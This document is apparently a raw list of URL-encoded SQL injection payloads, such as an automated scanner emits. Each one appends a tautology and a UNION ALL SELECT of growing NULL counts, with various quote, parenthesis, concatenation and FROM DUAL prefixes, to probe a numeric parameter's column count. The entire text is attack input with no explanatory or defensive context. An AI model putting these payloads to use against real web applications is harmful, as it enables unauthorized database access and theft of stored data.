1234.5%22%29%20WHERE%204502%3D4502%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%203773%3D3773%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207244%3D7244%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207269%3D7269%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%208813%3D8813%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%209446%3D9446%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%201799%3D1799%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%205427%3D5427%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206045%3D6045%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%205249%3D5249%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206100%3D6100%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203795%3D3795%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%209167%3D9167%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204297%3D4297%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206557%3D6557%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%201394%3D1394%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%201241%3D1241%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%205795%3D5795%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%209255%3D9255%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%204663%3D4663%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%205153%3D5153%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%201364%3D1364%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%205619%3D5619%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202345%3D2345%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206607%3D6607%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206506%3D6506%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%203028%3D3028%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202839%3D2839%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%208096%3D8096%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206280%3D6280%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%207280%3D7280%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%205581%3D5581%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206607%3D6607%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%201643%3D1643%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%209627%3D9627%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%208383%3D8383%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%207157%3D7157%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%206871%3D6871%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%206840%3D6840%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%202209%3D2209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%201077%3D1077%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208156%3D8156%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208540%3D8540%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%206087%3D6087%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%205587%3D5587%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208751%3D8751%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27iQcA%27%20FROM%20DUAL%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27TmMd%27%20FROM%20DUAL%20WHERE%202601%3D2601%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27XMRV%27%20FROM%20DUAL%20WHERE%202758%3D2758%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27oNOS%27%20FROM%20DUAL%20WHERE%208216%3D8216%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27cyMl%27%20FROM%20DUAL%20WHERE%209394%3D9394%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ZVOS%27%20FROM%20DUAL%20WHERE%209536%3D9536%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27nOMV%27%20FROM%20DUAL%20WHERE%208216%3D8216%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27FTky%27%20FROM%20DUAL%20WHERE%204221%3D4221%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ftIc%27%20FROM%20DUAL%20WHERE%208172%3D8172%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27sHZv%27%20FROM%20DUAL%20WHERE%205259%3D5259%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27bqAM%27%20WHERE%203458%3D3458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27wTae%27%20WHERE%205131%3D5131%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27GsQE%27%20WHERE%201090%3D1090%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27mjCr%27%20WHERE%201883%3D1883%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27XtKF%27%20WHERE%203729%3D3729%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27JFCf%27%20WHERE%204534%3D4534%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27TiGy%27%20WHERE%204464%3D4464%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27aCpx%27%20WHERE%203781%3D3781%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27vucR%27%20WHERE%201384%3D1384%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27rAvr%27%20WHERE%207177%3D7177%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20VRFw%20WHERE%203435%3D3435%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20TKQd%20WHERE%206581%3D6581%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20zehz%20WHERE%208828%3D8828%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20XvYV%20WHERE%207083%3D7083%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20oiRO%20WHERE%209222%3D9222%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20snty%20WHERE%204782%3D4782%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Mfsd%20WHERE%209116%3D9116%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Xnid%20WHERE%208978%3D8978%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 